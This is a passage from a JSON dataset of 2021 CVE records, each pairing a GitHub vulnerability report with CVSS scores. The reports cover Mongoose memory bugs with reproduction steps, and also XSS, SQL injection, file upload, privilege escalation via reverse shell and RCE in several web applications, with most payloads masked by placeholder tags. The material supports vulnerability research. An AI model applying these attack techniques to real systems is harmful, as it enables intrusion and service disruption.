        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-26259",
        "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/417",
        "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/417",
        "Repo_new": "michaelrsweet/htmldoc",
        "Issue_Created_At": "2021-01-26T08:58:27Z",
        "description": "APITAG heap buffer overflow on APITAG ps APITAG Hello, While fuzzing htmldoc , I found a heap buffer overflow in the APITAG ps APITAG test platform htmldoc Version NUMBERTAG git FILETAG ERRORTAG CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-26528",
        "Issue_Url_old": "https://github.com/cesanta/mongoose/issues/1201",
        "Issue_Url_new": "https://github.com/cesanta/mongoose/issues/1201",
        "Repo_new": "cesanta/mongoose",
        "Issue_Created_At": "2021-01-23T13:57:54Z",
        "description": "NULL pointer dereference caused by incorrect error handling of calloc in mg_http_serve_file APITAG Incorrect handling of the value returned by calloc may lead to: NULL pointer dereference and segmentation fault error in case of restrictive memory protection, near NULL pointer overwrite in case of limited memory restrictions (e.g. in embedded environments). Memory allocations are triggered during handling of each HTTP requests, so the allocation error can be caused remotely by flooding with requests until exhausting the memory. In some embedded environments near zero memory areas are used to store device configuration, so in this case such configuration can be overwritten remotely. Vulnerable code (mongoose.c NUMBERTAG struct http_data NUMBERTAG oid old_pfn_data; // Previous pfn_data NUMBERTAG FILE fp; // For static file serving NUMBERTAG oid mg_http_serve_file(struct mg_connection c, struct mg_http_message hm NUMBERTAG const char path, const char mime, const char hdrs NUMBERTAG struct http_data d = (struct http_data ) calloc NUMBERTAG sizeof( d NUMBERTAG d >fp = fp NUMBERTAG d >old_pfn_data = c >pfn_data NUMBERTAG c >pfn = static_cb NUMBERTAG c >pfn_data = d; See following recommendations for details (especially the calloc example): URLTAG The issue can be reproduced and tested using APITAG ( URLTAG Reproduction steps NUMBERTAG Install gdb NUMBERTAG Download and unpack code of APITAG ( URLTAG NUMBERTAG Remove hook files from from the APITAG directory APART from hooks_memory.c file: find APITAG name \"hooks_[acfost] [.]c\" delete NUMBERTAG Comment out the whole contents of hooks/hooks_memory.c file APART from the calloc section to disable hooks for: malloc and realloc. / / / void calloc(size_t num, size_t size); / typedef void ( calloc_func_t)(size_t num, size_t size); static void real_calloc(size_t num, size_t size) ... void calloc(size_t num, size_t size NUMBERTAG Continue with compilation of APITAG according to the manual ( URLTAG cd APITAG make NUMBERTAG Set ESAN to the path of APITAG directory export PATHTAG NUMBERTAG Download and unzip attached map APITAG NUMBERTAG Download, unzip and compile mongoose and example \"complete NUMBERTAG Download and unzip attached map APITAG FILETAG NUMBERTAG Run Mongoose \"complete\" example with APITAG in gdb using: gdb batch ex='run' ex='backtrace' args env APITAG ./example APITAG NUMBERTAG Open in the browser following URL (where APITAG is address of tested Mongoose instance): URLTAG APITAG memory operations can occur in a different sequence, actions NUMBERTAG and NUMBERTAG sometimes need to be executed multiple times.) You should receive similar output: process NUMBERTAG is executing new program: PATHTAG NUMBERTAG I APITAG NUMBERTAG accepting on URLTAG Program received signal SIGSEGV, Segmentation fault NUMBERTAG ef1 in mg_http_serve_file (c NUMBERTAG a8c0, hm NUMBERTAG fffffffdb NUMBERTAG path NUMBERTAG d4 APITAG mime NUMBERTAG c9 \"text/plain\", hdrs NUMBERTAG c8 \"\") at PATHTAG NUMBERTAG d >fp = fp NUMBERTAG ef1 in mg_http_serve_file (c NUMBERTAG a8c0, hm NUMBERTAG fffffffdb NUMBERTAG path NUMBERTAG d4 APITAG mime NUMBERTAG c9 \"text/plain\", hdrs NUMBERTAG c8 \"\") at PATHTAG NUMBERTAG e in cb (c NUMBERTAG a8c0, e NUMBERTAG ev_data NUMBERTAG fffffffdb NUMBERTAG fn_data NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG in mg_call (c NUMBERTAG a8c0, e NUMBERTAG ev_data NUMBERTAG fffffffdb NUMBERTAG at PATHTAG NUMBERTAG f5 in http_cb (c NUMBERTAG a8c0, e NUMBERTAG ev_data NUMBERTAG fffffffe NUMBERTAG fn_data NUMBERTAG fffffffe NUMBERTAG at PATHTAG NUMBERTAG in mg_call (c NUMBERTAG a8c0, e NUMBERTAG ev_data NUMBERTAG fffffffe NUMBERTAG at PATHTAG NUMBERTAG e NUMBERTAG e in read_conn (c NUMBERTAG a8c0, fn NUMBERTAG dc3a APITAG ) at PATHTAG NUMBERTAG f NUMBERTAG a in mg_mgr_poll (mgr NUMBERTAG fffffffe NUMBERTAG ms NUMBERTAG at PATHTAG NUMBERTAG af3 in main () at APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-26529",
        "Issue_Url_old": "https://github.com/cesanta/mongoose/issues/1203",
        "Issue_Url_new": "https://github.com/cesanta/mongoose/issues/1203",
        "Repo_new": "cesanta/mongoose",
        "Issue_Created_At": "2021-01-23T17:58:50Z",
        "description": "Out of bounds write caused by incorrect error handling of calloc in mg_tls_init APITAG Mongoose HTTPS server (compiled with APITAG support) is vulnerable to remote OOB write attack via connection request after exhausting memory pool. Incorrect handling of the value returned by calloc in mg_tls_init may lead to: out of bound write attempt and segmentation fault error in case of restrictive memory protection, near NULL pointer (at NUMBERTAG overwrite in case of limited memory restrictions (e.g. in embedded environments). Memory allocations are triggered during handling of each HTTPS requests, so the allocation error can be caused remotely by flooding with requests until exhausting the memory. In some embedded environments near zero memory areas are used to store device configuration, so in this case such configuration can be overwritten remotely. Vulnerable code (mongoose.c NUMBERTAG struct mg_tls NUMBERTAG char cafile; // CA certificate path NUMBERTAG mbedtls NUMBERTAG crt ca; // Parsed CA certificate NUMBERTAG mbedtls NUMBERTAG crt cert; // Parsed certificate NUMBERTAG mbedtls_ssl_context ssl; // SSL/TLS context NUMBERTAG mbedtls_ssl_config conf; // SSL TLS config NUMBERTAG mbedtls_pk_context pk; // Private key context NUMBERTAG int mg_tls_init(struct mg_connection c, struct mg_tls_opts opts NUMBERTAG struct mg_tls tls = (struct mg_tls ) calloc NUMBERTAG sizeof( tls)); printf(\"mg_tls_init tls = %p %ld \", tls, &(tls >ssl NUMBERTAG int rc NUMBERTAG LOG(LL_DEBUG, (\"%lu Setting TLS, CA: %s, cert: %s, key: %s\", c >id NUMBERTAG opts >ca == NULL ? \"null\" : opts >ca NUMBERTAG opts >cert == NULL ? \"null\" : opts >cert NUMBERTAG opts >certkey == NULL ? \"null\" : opts >certkey NUMBERTAG mbedtls_ssl_init(&tls >ssl NUMBERTAG mbedtls_ssl_config_init(&tls >conf NUMBERTAG mbedtls_ssl_conf_dbg(&tls >conf, debug_cb, c); See following recommendations for details (especially the calloc example): URLTAG The issue can be reproduced and tested using APITAG ( URLTAG Reproduction steps NUMBERTAG Install gdb NUMBERTAG Download and unpack code of APITAG ( URLTAG NUMBERTAG Perform compilation of APITAG according to the manual ( URLTAG cd APITAG make NUMBERTAG Set ESAN to the path of APITAG directory export PATHTAG NUMBERTAG Download and unzip attached map APITAG FILETAG NUMBERTAG Install APITAG library NUMBERTAG Download, unzip and compile mongoose example \"http restful server\" with define MBEDTLS_DIR set for APITAG directory and debug symbols ( g NUMBERTAG Run Mongoose \"http restful server\" example with APITAG in gdb using: gdb batch ex='run' ex='backtrace' args env APITAG ./example APITAG NUMBERTAG Open in the browser following URL (where APITAG is address of tested Mongoose instance): URLTAG You should receive similar output: process NUMBERTAG is executing new program: PATHTAG NUMBERTAG I APITAG Setting log level to NUMBERTAG I APITAG NUMBERTAG accepting on URLTAG Program received signal SIGSEGV, Segmentation fault NUMBERTAG ffff NUMBERTAG d0 in mbedtls_ssl_init () from PATHTAG NUMBERTAG ffff NUMBERTAG d0 in mbedtls_ssl_init () from PATHTAG NUMBERTAG fa9 in mg_tls_init (c NUMBERTAG c0, opts NUMBERTAG fffffffdbf0) at APITAG NUMBERTAG a in fn (c NUMBERTAG c0, e NUMBERTAG ev_data NUMBERTAG fn_data NUMBERTAG at APITAG NUMBERTAG df1 in mg_call (c NUMBERTAG c0, e NUMBERTAG ev_data NUMBERTAG at src/event.c NUMBERTAG fae4 in accept_conn (mgr NUMBERTAG fffffffdd NUMBERTAG lsn NUMBERTAG c0) at APITAG NUMBERTAG in mg_mgr_poll (mgr NUMBERTAG fffffffdd NUMBERTAG ms NUMBERTAG at APITAG NUMBERTAG de in main () at APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-26530",
        "Issue_Url_old": "https://github.com/cesanta/mongoose/issues/1204",
        "Issue_Url_new": "https://github.com/cesanta/mongoose/issues/1204",
        "Repo_new": "cesanta/mongoose",
        "Issue_Created_At": "2021-01-23T18:20:54Z",
        "description": "Out of bounds write caused by incorrect error handling of calloc in mg_tls_init APITAG Mongoose HTTPS server (compiled with APITAG support) is vulnerable to remote OOB write attack via connection request after exhausting memory pool. Incorrect handling of the value returned by calloc in mg_tls_init may lead to: out of bound write attempt and segmentation fault error in case of restrictive memory protection, near NULL pointer overwrite in case of limited memory restrictions (e.g. in embedded environments). Memory allocations are triggered during handling of each HTTPS requests, so the allocation error can be caused remotely by flooding with requests until exhausting the memory. In some embedded environments near zero memory areas are used to store device configuration, so in this case such configuration can be overwritten remotely. Vulnerable code (mongoose.c NUMBERTAG struct mg_tls NUMBERTAG SSL_CTX ct NUMBERTAG SSL ssl NUMBERTAG int mg_tls_init(struct mg_connection c, struct mg_tls_opts opts NUMBERTAG struct mg_tls tls = (struct mg_tls ) calloc NUMBERTAG sizeof( tls)); printf(\"tls = %p %ld \", tls, (long)(&tls >ct NUMBERTAG const char id = \"mongoose NUMBERTAG static unsigned char s_initialised NUMBERTAG int rc NUMBERTAG if (!s_initialised NUMBERTAG APITAG NUMBERTAG s_initialised NUMBERTAG tls >ctx = c >is_client ? APITAG NUMBERTAG APITAG NUMBERTAG if ((tls >ssl = SSL_new(tls >ctx)) == NULL NUMBERTAG mg_error(c, \"SSL_new NUMBERTAG goto fail NUMBERTAG See following recommendations for details (especially the calloc example): URLTAG The issue can be reproduced and tested using APITAG ( URLTAG Reproduction steps NUMBERTAG Install gdb NUMBERTAG Download and unpack code of APITAG ( URLTAG NUMBERTAG Perform compilation of APITAG according to the manual ( URLTAG cd APITAG make NUMBERTAG Set ESAN to the path of APITAG directory export PATHTAG NUMBERTAG Download and unzip attached map APITAG FILETAG NUMBERTAG Install APITAG library NUMBERTAG Download, unzip and compile mongoose example \"http restful server\" with define OPENSSL_DIR set for APITAG directory and debug symbols ( g NUMBERTAG Run Mongoose \"http restful server\" example with APITAG in gdb using: gdb batch ex='run' ex='backtrace' args env APITAG ./example APITAG NUMBERTAG Open in the browser following URL (where APITAG is address of tested Mongoose instance): URLTAG You should receive similar output: process NUMBERTAG is executing new program: PATHTAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG NUMBERTAG I APITAG NUMBERTAG accepting on URLTAG Program received signal SIGSEGV, Segmentation fault NUMBERTAG d6a in mg_tls_init (c NUMBERTAG opts NUMBERTAG fffffffdbf0) at APITAG NUMBERTAG src/tls.c: No such file or directory NUMBERTAG d6a in mg_tls_init (c NUMBERTAG opts NUMBERTAG fffffffdbf0) at APITAG NUMBERTAG in fn (c NUMBERTAG e NUMBERTAG ev_data NUMBERTAG fn_data NUMBERTAG at APITAG NUMBERTAG d NUMBERTAG in mg_call (c NUMBERTAG e NUMBERTAG ev_data NUMBERTAG at src/event.c NUMBERTAG fa1d in accept_conn (mgr NUMBERTAG fffffffdd NUMBERTAG lsn NUMBERTAG at APITAG NUMBERTAG bd in mg_mgr_poll (mgr NUMBERTAG fffffffdd NUMBERTAG ms NUMBERTAG at APITAG NUMBERTAG bb in main () at APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-26716",
        "Issue_Url_old": "https://github.com/emoncms/emoncms/issues/1652",
        "Issue_Url_new": "https://github.com/emoncms/emoncms/issues/1652",
        "Repo_new": "emoncms/emoncms",
        "Issue_Created_At": "2021-01-27T20:28:35Z",
        "description": "XSS Vulnerability. Hi, I have found a XSS in vulnerability in: PATHTAG using the parameter 'node' Proof of concept exploit: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-26722",
        "Issue_Url_old": "https://github.com/linkedin/oncall/issues/341",
        "Issue_Url_new": "https://github.com/linkedin/oncall/issues/341",
        "Repo_new": "linkedin/oncall",
        "Issue_Created_At": "2021-02-05T11:56:10Z",
        "description": "Reflected Cross Site Scripting in seach bar.. Hi! I've found a reflected cross site scripting vulnerability in Oncall's search bar. I've reported this issue to the APITAG Information Security Response Center back in September NUMBERTAG but Oncall still seems vulnerable to this date. Therefore I decided to report it here. Reproduction NUMBERTAG Navigate to ERRORTAG NUMBERTAG Click on the search bar where it now says ERRORTAG Result By clicking the search bar, a search will be done to the search API endpoint. Because nothing can be found a ERRORTAG message will be shown. Because this message includes the search query and lacks the proper HTML output encoding, the query is interpreted as HTML/JS and an alert containing the APITAG is shown. FILETAG Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can: Steal the user's credentials by altering the working of the displayed login form. Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Mitigation In general, effectively preventing XSS vulnerabilities is likely to involve a combination of the following measures: Filter input on arrival. At the point where user input is received, filter as strictly as possible based on what is expected or valid input. Encode data on output. At the point where user controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL, APITAG and CSS encoding. Content Security Policy. As a last line of defense, you could use a (default) Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-26739",
        "Issue_Url_old": "https://github.com/millken/doyocms/issues/5",
        "Issue_Url_new": "https://github.com/millken/doyocms/issues/5",
        "Repo_new": "millken/doyocms",
        "Issue_Created_At": "2021-02-01T04:26:10Z",
        "description": "There is a sqli vulnerability in APITAG admin user login required. Compared with the previous injection vulnerability, this vulnerability is more harmful because it can be triggered without logging in to the management account. The syntax of the cms filter function is wrong, which causes the filter of the array to not take effect FILETAG in APITAG FILETAG payload\uff1a URLTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-26740",
        "Issue_Url_old": "https://github.com/millken/doyocms/issues/4",
        "Issue_Url_new": "https://github.com/millken/doyocms/issues/4",
        "Repo_new": "millken/doyocms",
        "Issue_Created_At": "2021-02-01T04:18:20Z",
        "description": "Vulnerabilities can be used to upload files of any type. in FILETAG The first line receives the parameter allow, which is passed in when the APITAG object is instantiated, and when the syupload object is constructed, the passed allow is directly used as the allowed suffix dictionary FILETAG FILETAG So when we upload, we only need to add an allow parameter to upload files with any suffix FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-26758",
        "Issue_Url_old": "https://github.com/litespeedtech/openlitespeed/issues/217",
        "Issue_Url_new": "https://github.com/litespeedtech/openlitespeed/issues/217",
        "Repo_new": "litespeedtech/openlitespeed",
        "Issue_Created_At": "2021-01-31T14:53:13Z",
        "description": "Privilege Escalation Security Issue. Description I found a way to escalate privileges on Ubuntu NUMBERTAG ia APITAG web server that runs with user(nobody):group(nogroup) privilege . According to this vulnerability , system user that has admin panel credentials can add himself to sudo group or shadow group( to read /etc/shadow file) . So that the user can execute command with high privileges. Proof of Concept NUMBERTAG There is a test user that is not member of sudo group. FILETAG NUMBERTAG User changes External App configuration as following to get reverse shell with high privileges. FILETAG FILETAG ERRORTAG NUMBERTAG The user sends a Graceful Restart request through admin panel and get reverse shell with sudo group privileges. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-26776",
        "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/29",
        "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/29",
        "Repo_new": "cskaza/cszcms",
        "Issue_Created_At": "2021-02-02T01:16:34Z",
        "description": "Multiple Stored XSS Cross Site Scripting on CSZ CMS NUMBERTAG Multiple Stored XSS Cross Site Scripting on CSZ CMS NUMBERTAG Login with editor account with rights to Forms Builder, XML Plugin Widgets, Statistic for link, Banner Manager, Carousel Widget, Pages Content, Language, Plugin Manager. Forms Builder Add or edit Forms Builder: Forms Name: APITAG APITAG APITAG \"> XML Plugin Widgets Add or edit Widgets: Widget Name: APITAG APITAG APITAG \"> Statistic for link Add New Link: URL: APITAG APITAG APITAG \"> Banner Manager Add New Banner : Banner Name: APITAG APITAG APITAG \"> Carousel Widget Add new Carousel: Carousel Name: APITAG APITAG APITAG \"> Pages Content Add or edit Pages Content: Pages Name: Abouts Us&lt;noframes&gt;&lt;p PATHTAG NUMBERTAG APITAG NUMBERTAG gt;&quot;&gt; Language Add new Language: Language Name: APITAG APITAG APITAG \"> Plugin Manager Add new Category( PATHTAG ): Category Name: APITAG APITAG APITAG \"> Add new Article( PATHTAG ): Article Name: APITAG APITAG APITAG \">",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-26786",
        "Issue_Url_old": "https://github.com/customercentric-selling-poland/playtuber/issues/1",
        "Issue_Url_new": "https://github.com/customercentric-selling-poland/playtuber/issues/1",
        "Repo_new": "customercentric-selling-poland/playtuber",
        "Issue_Created_At": "2021-02-02T16:33:04Z",
        "description": "APITAG FILETAG APITAG with no Limit to Excute php code Vulnerability. read this code in APITAG FILETAG FILETAG We can see that there is no detect the site has installed or not. FILETAG So we can Reinstall the site with our local database to modify the administrator's password to login . And also we can insert php code to FILETAG to excute php code. Submit form like this: FILETAG And we can excute code in FILETAG . FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-26799",
        "Issue_Url_old": "https://github.com/omeka/Omeka/issues/935",
        "Issue_Url_new": "https://github.com/omeka/omeka/issues/935",
        "Repo_new": "omeka/omeka",
        "Issue_Created_At": "2021-02-03T18:18:22Z",
        "description": "Stored XSS in the PATHTAG page. Hello Omeka Team! I was looking through your application APITAG and I discovered a stored XSS bug at PATHTAG While most of the pages filter out tags that are not in the whitelist when APITAG HTML\" is on, PATHTAG seems to allow them. My guess is that this is not the expected behavior? POC NUMBERTAG Create an item with a file attachment NUMBERTAG Edit the file NUMBERTAG Place ERRORTAG in one of the fields and toggle APITAG HTML\" to on. (An alert should pop up now, but ignore that and save changes NUMBERTAG Access the page containing the file, and an alert should pop up NUMBERTAG APITAG Switch to a different account to verify that this affects all users. Impact: client side code execution This bug shouldn't be very dangerous since it is only available to contributors, admins, and superusers. The session cookie is httponly, and the csrf tokens seem to be set properly (upon first glance). However, the XSS bug can be leveraged in many other ways, and it could increase the impact of a future vulnerability. Therefore, it's probably better to have it fixed. Please let me know if anything is unclear, or if this is not a legitimate issue. Thanks in advance!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-26805",
        "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/395",
        "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/395",
        "Repo_new": "justdan96/tsmuxer",
        "Issue_Created_At": "2021-02-03T07:49:24Z",
        "description": "heap buffer overflow tsmuxer. hello\uff0cguys.I use afl fuzz to test APITAG found a crash. APITAG FILETAG Asan log ERRORTAG gdb ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-26812",
        "Issue_Url_old": "https://github.com/udima-university/moodle-mod_jitsi/issues/67",
        "Issue_Url_new": "https://github.com/udima-university/moodle-mod_jitsi/issues/67",
        "Repo_new": "udima-university/moodle-mod_jitsi",
        "Issue_Created_At": "2021-01-29T12:13:02Z",
        "description": "XSS in FILETAG . The parameter \"nom\" is not filtered properly causing javascript code to be injected. FILETAG FILETAG FILETAG It can be easily triggered by clicking this URL URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-26834",
        "Issue_Url_old": "https://github.com/alagrede/znote-app/issues/5",
        "Issue_Url_new": "https://github.com/alagrede/znote-app/issues/5",
        "Repo_new": "alagrede/znote-app",
        "Issue_Created_At": "2021-02-03T14:00:34Z",
        "description": "Multiple Stored XSS . APITAG Multiple XSS payloads are available for znote. It leads to attacker's javascript execution APITAG You can try with copy paste the payloads below NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-26835",
        "Issue_Url_old": "https://github.com/Zettlr/Zettlr/issues/1716",
        "Issue_Url_new": "https://github.com/zettlr/zettlr/issues/1716",
        "Repo_new": "zettlr/zettlr",
        "Issue_Created_At": "2021-02-05T17:23:04Z",
        "description": "Cross site scripting leads to Remote Code Execution. Description XSS leads to remote code execution Reproducing NUMBERTAG Download the crafted .md file ( URLTAG Or make the md file by yourself. FILETAG content: APITAG NUMBERTAG Open the file with Zettlr APITAG Version NUMBERTAG Once the page refresh or you can click anywhere for refreshing, calculator pops up. APITAG Expected behaviour XSS payload shouldn't execute Set APITAG as false Platform OS and version: Windows NUMBERTAG Zettlr Version NUMBERTAG Additional information",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-26843",
        "Issue_Url_old": "https://github.com/blueness/sthttpd/issues/14",
        "Issue_Url_new": "https://github.com/blueness/sthttpd/issues/14",
        "Repo_new": "blueness/sthttpd",
        "Issue_Created_At": "2021-01-26T20:14:02Z",
        "description": "Potential memory corruption/crash due to overlapping strcpy arguments. When building sthttpd with ASAN ( APITAG ) I noticed a number of crashes with trivial requests such as the following: APITAG The problem is most visible on systems where strcpy is implemented using memcpy (e.g. GLIBC and APITAG here we end up with memcpy on overlapping memory ranges: ERRORTAG Regardless of whether the server crashes, the behaviour of strcpy with overlapping source and destination is warned against in the manpage as the resulting behaviour is undefined. As the trace above shows, the offending call happens from URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-26916",
        "Issue_Url_old": "https://github.com/nopSolutions/nopCommerce/issues/5322",
        "Issue_Url_new": "https://github.com/nopsolutions/nopcommerce/issues/5322",
        "Repo_new": "nopsolutions/nopcommerce",
        "Issue_Created_At": "2021-02-08T06:57:44Z",
        "description": "XSS issue in the \"discountcode\" parameter. The vulnerability is a reflected XSS in the discountcode URL parameter. If an invalid discount code is entered, the value is reflected directly in the response without HTML encoding. This was tested on Google Chrome, Firefox and Edge with a fresh install of APITAG I have attached a screenshot of the APITAG The cause of the issue is the following line: URLTAG which uses the APITAG function without sanitising the user input. The same code exists in the NUMBERTAG release tag as well: URLTAG Let me know if you require additional information. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-26926",
        "Issue_Url_old": "https://github.com/jasper-software/jasper/issues/264",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/264",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2021-01-29T10:33:49Z",
        "description": "APITAG heap buffer overflow vulnerability. Hi, there's a heap buffer overflow vulnerability in function APITAG , ( APITAG ) poc: FILETAG please compile the Jasper with ASAN, and run the poc with APITAG . It seems because of the APITAG is not equal with APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-26927",
        "Issue_Url_old": "https://github.com/jasper-software/jasper/issues/265",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/265",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2021-01-29T10:42:37Z",
        "description": "APITAG Null Pointer Access. Hi, There's a Null Pointer Access in APITAG run the poc with APITAG poc: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-26948",
        "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/410",
        "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/410",
        "Repo_new": "michaelrsweet/htmldoc",
        "Issue_Created_At": "2021-01-22T07:34:10Z",
        "description": "SEGV on unknown address NUMBERTAG While fuzzing htmldoc I found a segmentation fault in the APITAG function, in APITAG testcase:(zipped so APITAG accepts it) FILETAG reproduced by running: APITAG htmldoc Version NUMBERTAG git [master NUMBERTAG f9d NUMBERTAG tested on: OS APITAG NUMBERTAG LTS kernel NUMBERTAG generic compiler: clang version NUMBERTAG ubuntu1 Target NUMBERTAG pc linux gnu OS : APITAG Catalina NUMBERTAG F NUMBERTAG APITAG Pro APITAG NUMBERTAG inch, Early NUMBERTAG compiler: Apple clang version NUMBERTAG clang APITAG Install from snap or download mac dmg don't crash for this testcase. addresssanitizer ERRORTAG gdb CODETAG The bug locate in APITAG compare_images. The arguments of compare_images didn't checked so APITAG lead a segfault due to to null pointer.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-27112",
        "Issue_Url_old": "https://github.com/eddy8/LightCMS/issues/19",
        "Issue_Url_new": "https://github.com/eddy8/lightcms/issues/19",
        "Repo_new": "eddy8/lightcms",
        "Issue_Created_At": "2021-02-06T10:47:54Z",
        "description": "Arbitrary file read & RCE vulnerability in APITAG . Description There is no filtering when downloading external images, which can casue arbitrary file reading and remote code execution. Impact Version lightcms latest version APITAG Steps to Reproduce Arbitrary File Reading FILETAG FILETAG Remote Code Execution Place the php file which wants to be executed on your own server, and download it: FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-27116",
        "Issue_Url_old": "https://github.com/beego/beego/issues/4484",
        "Issue_Url_new": "https://github.com/beego/beego/issues/4484",
        "Repo_new": "beego/beego",
        "Issue_Created_At": "2021-02-07T09:28:17Z",
